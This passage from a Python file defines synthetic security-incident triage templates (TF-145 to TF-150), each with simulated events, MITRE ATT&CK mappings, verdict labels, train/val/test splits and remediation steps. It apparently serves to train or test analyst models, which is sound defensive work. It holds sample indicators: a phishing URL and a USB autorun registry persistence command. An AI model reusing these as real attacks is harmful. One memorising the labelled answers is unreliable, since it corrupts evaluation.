     [("Known C2 infrastructure attempted inbound probe against corporate perimeter.", ["EVT-001", "EVT-002"], "medium")],
     "Hostile infrastructure probe blocked at boundary firewall; no internal execution or established session observed.",
     [("T1071.001", "Web Protocols", "Command and Control", ["EVT-001"])],
     [("Add IP 194.26.29.112 to permanent perimeter firewall blocklist.", "high", "Prevent further probes.")], None),

    ("TF-145", "Unknown Hash on Internal Test Server with Ambiguous Metadata", "threat_intel_scenarios", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Linux", "server", "deployer",
     "Unrecognized Binary Executing on Build Server Without Threat Intel Match", "medium", "Unknown Binary Execution",
     [("process_creation", "Unknown binary /tmp/custom_agent launched by deployer", '{"path": "/tmp/custom_agent"}'),
      ("threat_intel_match", "SHA-256 hash of custom_agent has 0 records on threat intelligence database (Unknown)", '{"hash": "{clean_hash}", "status": "UNKNOWN"}')],
     [("Unrecognized binary executed on server with no matching records on threat intelligence feeds.", ["EVT-001", "EVT-002"], "medium")],
     "Could be an internal proprietary software build or zero-day malware; lack of behavioral logs or threat intel prevents classification.", [],
     [("Submit binary /tmp/custom_agent to local sandbox and query developer teams regarding internal compilation.", "high", "Determine binary identity.")],
     ["Sandbox behavioral execution report", "Git repository commit logs for build runner"]),

    ("TF-146", "Threat Intel Domain Match with DNS Sinkhole Response", "threat_intel_scenarios", "alert_triage", "insufficient_evidence", "val", "suspicious_vs_insufficient_evidence", "Windows", "workstation", "employee10",
     "Workstation Querying Known C2 Domain Redirected to Internal Sinkhole", "medium", "DNS Sinkhole Hit",
     [("dns_query", "Workstation queried known malware domain {domain}", '{"domain": "{domain}"}'),
      ("threat_intel_match", "Domain {domain} listed on commercial threat feed as Emotet C2 domain", '{"domain": "{domain}", "feed": "MalwareDomains"}'),
      ("network_connection", "Corporate DNS server returned sinkhole IP 127.0.0.1, blocking external connection", '{"sinkhole_ip": "127.0.0.1"}')],
     [("Client attempted to resolve active C2 domain cataloged on external threat intelligence feeds.", ["EVT-001", "EVT-002"], "medium"),
      ("Protective DNS sinkhole neutralized external communication by returning loopback address.", ["EVT-003"], "medium")],
     "Endpoint queried sinkholed C2 domain, but missing endpoint process attribution requires additional telemetry.", [],
     [("Isolate workstation {hostname} and identify calling process responsible for DNS query.", "high", "Locate calling binary.")],
     ["DNS client operational event log", "EDR network socket telemetry"]),

    ("TF-147", "Benign File False Positive Flagged by Heuristic Antivirus", "threat_intel_scenarios", "evidence_analysis", "benign", "train", "benign_vs_suspicious", "Windows", "workstation", "intern01",
     "Internal Training Lab Script Flagged by Low-Confidence Heuristic Rule", "low", "Antivirus Heuristic False Positive",
     [("process_creation", "python.exe executed student_lab_test.py containing mock regex patterns", '{"script": "student_lab_test.py"}'),
      ("threat_intel_match", "Local AV flagged script with heuristic rule Win32/SuspiciousScript.H!heuristic", '{"av_vendor": "VendorAV", "detection": "Win32/SuspiciousScript.H!heuristic", "confidence": "LOW"}'),
      ("user_report", "Security education professor confirmed script is authorized student homework assignment", '{"professor": "Dr. Miller", "authorized": true}')],
     [("Local AV heuristic engine triggered low-confidence flag on academic script.", ["EVT-001", "EVT-002"], "low"),
      ("Authorized university faculty verified script as legitimate course curriculum assignment.", ["EVT-003"], "informational")],
     "Verified false positive: heuristic scanner triggered on mock string patterns inside approved academic homework.",
     [("T1059.006", "Python", "Execution", ["EVT-001"])],
     [("Close alert as benign academic false positive and submit suppression rule to SOC tuning queue.", "low", "Tune noisy heuristic.")], None),

    ("TF-148", "Conflicting Threat Intel: Known Malicious IP with Internal Service Activity", "threat_intel_scenarios", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Linux", "server", "svc_monitor",
     "Network Socket to Cloud IP Flagged on Stale Threat Intel Feed", "medium", "Conflicting Threat Telemetry",
     [("network_connection", "Monitoring service connected to external IP 198.51.100.42:443 sending telemetry metrics", '{"dest_ip": "198.51.100.42", "port": 443}'),
      ("threat_intel_match", "Threat feed flagged 198.51.100.42 as past botnet node 8 months ago with low confidence", '{"feed_age_days": 240, "confidence": "low"}')],
     [("Internal monitoring service contacted cloud IP that holds stale historical flag on external feed.", ["EVT-001", "EVT-002"], "medium")],
     "Cloud IP re-allocation frequently causes stale threat intelligence false positives; verification of current IP owner needed.", [],
     [("Perform WHOIS and SSL certificate inspection on 198.51.100.42 to identify current legitimate cloud tenant.", "medium", "Verify IP ownership.")],
     ["WHOIS registry record", "SSL x509 certificate subject name for 198.51.100.42"]),

    ("TF-149", "Employee Reporting Phishing Email via Outlook Addin", "threat_intel_scenarios", "alert_triage", "likely_malicious", "test", "suspicious_vs_likely_malicious", "Windows", "workstation", "employee02",
     "User Reported Phishing Message with External Tracking Pixel", "high", "User Phish Report",
     [("user_report", "Employee reported email 'Pending Package Delivery Notice' via PhishAlarm button", '{"reporter": "employee02", "subject": "Pending Package Delivery Notice"}'),
      ("email", "Email contains credential phishing link directed to fake Microsoft login portal", '{"link": "http://login-verify-account.info/auth", "sender": "security@alert-service.net"}')],
     [("Vigilant employee reported suspicious email directed at harvesting corporate credentials.", ["EVT-001"], "low"),
      ("Email gateway analysis confirms destination is an active credential phishing infrastructure.", ["EVT-002"], "high")],
     "Targeted spearphishing campaign attempting corporate credential theft; neutralized by alert employee report.",
     [("T1566.002", "Spearphishing Link", "Initial Access", ["EVT-002"])],
     [("Block domain login-verify-account.info across email gateway and perimeter firewalls.", "immediate", "Halt credential theft."),
      ("Scan all enterprise inboxes and purge instances of the malicious phish.", "high", "Remediate campaign.")], None),

    ("TF-150", "Removable USB Drive Inserting AutoRun Script", "threat_intel_scenarios", "alert_triage", "confirmed_malicious", "train", None, "Windows", "workstation", "contractor01",
     "Removable Media Inserted with AutoRun INF and Hidden VBScript", "critical", "Removable Media Staging",
     [("file_modification", "Removable drive E:\\ mounted containing hidden autorun.inf and sync.vbs", '{"drive": "E:\\\\", "files": ["autorun.inf", "sync.vbs"], "hidden": true}'),
      ("process_creation", "wscript.exe executed E:\\sync.vbs when removable media was browsed in Explorer", '{"parent": "explorer.exe", "child": "wscript.exe", "cmd": "wscript.exe E:\\\\sync.vbs"}'),
      ("registry_modification", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run entry added pointing to E:\\sync.vbs", '{"key": "Run", "value": "USBUpdate", "data": "wscript.exe E:\\\\sync.vbs"}')],
     [("Removable USB drive containing hidden AutoRun script inserted into corporate endpoint.", ["EVT-001"], "high"),
      ("Windows Script Host launched VBScript payload which established registry autorun persistence.", ["EVT-002", "EVT-003"], "critical")],
     "Removable media used as initial execution vector dropping persistent VBScript payload.",
     [("T1059.005", "Visual Basic", "Execution", ["EVT-002"]),
      ("T1547.001", "Registry Run Keys", "Persistence", ["EVT-003"])],
     [("Unmount and seize physical USB device from {hostname}.", "immediate", "Contain physical infection vector."),
      ("Remove registry persistence key and kill active wscript process.", "immediate", "Clean endpoint.")], None),
]

print(f"Chunk 5 loaded: {len(CHUNK_5)} templates.")
